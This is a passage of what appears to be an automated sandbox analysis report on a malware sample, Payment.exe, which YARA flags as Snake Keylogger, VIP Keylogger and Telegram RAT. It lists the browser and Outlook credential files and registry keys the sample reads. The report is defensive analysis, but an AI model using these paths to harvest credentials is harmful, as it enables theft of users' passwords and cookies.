Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTE8B6.tmp VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTE8D6.tmp VolumeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Queries volume information: C:\Users\user\AppData\Roaming\jwBqGZseW.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\perfhost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\Spectrum.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\TieringEngineService.exe

Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias

Source: C:\Users\user\Desktop\Payment.exe

8_2_02E68550

Source: C:\Users\user\Desktop\Payment.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment.exe PID: 7248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jwBqGZseW.exe PID: 6056, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment.exe PID: 7248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jwBqGZseW.exe PID: 6056, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Payment.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2138445632.0000000003ADF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2150772680.0000000003DD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2150258037.0000000004A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment.exe PID: 7248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jwBqGZseW.exe PID: 6056, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPE
